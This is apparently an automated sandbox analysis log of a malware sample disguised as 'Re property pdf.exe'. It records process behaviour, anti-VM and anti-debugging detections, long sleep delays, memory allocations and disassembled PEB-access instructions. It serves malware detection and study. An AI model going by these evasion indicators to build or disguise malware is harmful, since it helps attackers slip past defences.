            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Re property pdf.exe PID: 7480, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: hwOHPmqcegxcxb.exe PID: 7852, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 9DA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 2D40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 4E40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 8A60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 9A60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: 9C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeMemory allocated: AC50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E rdtsc 6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6024Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 711Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 6628Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 3345Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\Re property pdf.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe TID: 7872Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe TID: 7404Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664Thread sleep count: 6628 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664Thread sleep time: -13256000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664Thread sleep count: 3345 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 2664Thread sleep time: -6690000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Re property pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
            Source: PresentationHost.exe, 00000011.00000002.4211371395.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX&~r
            Source: uGMCFMVqKoR.exe, 00000010.00000002.4211554273.0000000000AC0000.00000004.00000001.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.2451257091.000002C70C51C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E rdtsc 6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00417483 LdrLoadDll,6_2_00417483
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov ecx, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov ecx, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov ecx, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov eax, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE10E mov ecx, dword ptr fs:[00000030h]6_2_010AE10E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC0F0 mov eax, dword ptr fs:[00000030h]6_2_00FFC0F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AA118 mov ecx, dword ptr fs:[00000030h]6_2_010AA118
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AA118 mov eax, dword ptr fs:[00000030h]6_2_010AA118
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AA118 mov eax, dword ptr fs:[00000030h]6_2_010AA118
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AA118 mov eax, dword ptr fs:[00000030h]6_2_010AA118
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C0115 mov eax, dword ptr fs:[00000030h]6_2_010C0115
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA0E3 mov ecx, dword ptr fs:[00000030h]6_2_00FFA0E3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030124 mov eax, dword ptr fs:[00000030h]6_2_01030124
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01094144 mov eax, dword ptr fs:[00000030h]6_2_01094144
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01094144 mov eax, dword ptr fs:[00000030h]6_2_01094144
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01094144 mov ecx, dword ptr fs:[00000030h]6_2_01094144
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01094144 mov eax, dword ptr fs:[00000030h]6_2_01094144
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01094144 mov eax, dword ptr fs:[00000030h]6_2_01094144
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01098158 mov eax, dword ptr fs:[00000030h]6_2_01098158
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006154 mov eax, dword ptr fs:[00000030h]6_2_01006154
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006154 mov eax, dword ptr fs:[00000030h]6_2_01006154
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF80A0 mov eax, dword ptr fs:[00000030h]6_2_00FF80A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4164 mov eax, dword ptr fs:[00000030h]6_2_010D4164
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4164 mov eax, dword ptr fs:[00000030h]6_2_010D4164
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01040185 mov eax, dword ptr fs:[00000030h]6_2_01040185
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BC188 mov eax, dword ptr fs:[00000030h]6_2_010BC188
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BC188 mov eax, dword ptr fs:[00000030h]6_2_010BC188
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4180 mov eax, dword ptr fs:[00000030h]6_2_010A4180
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4180 mov eax, dword ptr fs:[00000030h]6_2_010A4180
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108019F mov eax, dword ptr fs:[00000030h]6_2_0108019F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108019F mov eax, dword ptr fs:[00000030h]6_2_0108019F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108019F mov eax, dword ptr fs:[00000030h]6_2_0108019F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108019F mov eax, dword ptr fs:[00000030h]6_2_0108019F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C61C3 mov eax, dword ptr fs:[00000030h]6_2_010C61C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C61C3 mov eax, dword ptr fs:[00000030h]6_2_010C61C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E1D0 mov eax, dword ptr fs:[00000030h]6_2_0107E1D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E1D0 mov eax, dword ptr fs:[00000030h]6_2_0107E1D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0107E1D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E1D0 mov eax, dword ptr fs:[00000030h]6_2_0107E1D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E1D0 mov eax, dword ptr fs:[00000030h]6_2_0107E1D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA020 mov eax, dword ptr fs:[00000030h]6_2_00FFA020
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC020 mov eax, dword ptr fs:[00000030h]6_2_00FFC020
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D61E5 mov eax, dword ptr fs:[00000030h]6_2_010D61E5
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010301F8 mov eax, dword ptr fs:[00000030h]6_2_010301F8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01084000 mov ecx, dword ptr fs:[00000030h]6_2_01084000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
